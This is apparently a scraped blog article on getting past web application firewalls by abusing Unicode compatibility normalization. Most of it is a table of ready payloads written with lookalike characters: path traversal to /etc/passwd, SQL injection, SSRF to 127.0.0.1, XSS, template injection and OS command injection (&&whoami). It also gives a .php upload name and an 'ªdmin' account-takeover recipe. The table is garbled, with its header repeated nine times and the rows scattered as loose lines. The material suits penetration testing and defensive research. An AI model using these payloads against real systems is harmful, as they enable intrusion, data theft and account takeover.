WAF Bypassing with Unicode Compatibility
Last updated
Last updated
https://jlajara.gitlab.io/Bypass_WAF_Unicode
Unicode Compatibility is a form of Unicode Equivalence which ensures that between characters or sequences of characters which may have distinct visual appearances or behaviors, the same abstract character is represented. For example, 𝕃 is normalized to L. This behaviour could open the door to abuse some weak implementations that performs unicode compatibility after the input is sanitized.
In order to find a complete list of characters that have the same meaning after unicode compatibility this amazing resource could be used:
A character can be searched and the same character after compatibility would be found. For example, the character < - https://www.compart.com/en/unicode/U+003C
Shows this three characters: ≮,﹤ and <. After clicking in each one we can see in the Decomposition section that are normalized in the following way:
≮ - < (U+003C) - ◌̸ (U+0338)
﹤ - < (U+003C)
< - < (U+003C)
In this case the character ≮ would not achieve our desired functionallity because it injects the character ◌̸ (U+0338) and will break our payload.
Tons of custom payloads could be crafted if normalization is performed, in this case I will give some ideas:
Path Traversal
SQL Injection
Server Side Request Forgery (SSRF)
Open Redirect
XSS
Template Injection
OS Command Injection
Arbitrary file upload
Business logic
Register a user with some characters similar to another user. Maybe the registration process will allow the registration because the user in this step is not normalized and allows this character. After that, suppose that the application performs some normalization after retrieving the user data.
1. Register ªdmin. There is not entry in database, registration successfull.
2. Login as ªdmin. Backend performs normalization and gives the results of admin.
3. Account takeover.
Referencia:
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
| Character | Payload | After Normalization |
|---|---|---|
‥ (U+2025)
‥/‥/‥/etc/passwd
../../../etc/passwd
︰(U+FE30)
︰/︰/︰/etc/passwd
../../../etc/passwd
'(U+FF07)
' or '1'='1
’ or ‘1’=’1
"(U+FF02)
" or "1"="1
” or “1”=”1
﹣ (U+FE63)
admin'﹣﹣
admin’–
⓪ (U+24EA)
①②⑦.⓪.⓪.①
127.0.0.1
。(U+3002)
jlajara。gitlab。io
jlajara.gitlab.io
/(U+FF0F)
//jlajara.gitlab.io
//jlajara.gitlab.io
<(U+FF1C)
<script src=a/>
<script src=a/>
"(U+FF02)
"onclick='prompt(1)'
“onclick=’prompt(1)’
﹛(U+FE5B)
﹛﹛3+3﹜﹜
{{3+3}}
[ (U+FF3B)
[[5+5]]
[[5+5]]
& (U+FF06)
&&whoami
&&whoami
| (U+FF5C)
|| whoami
||whoami
p (U+FF50) ʰ (U+02B0)
test.pʰp
test.php
ª (U+00AA)
ªdmin
admin
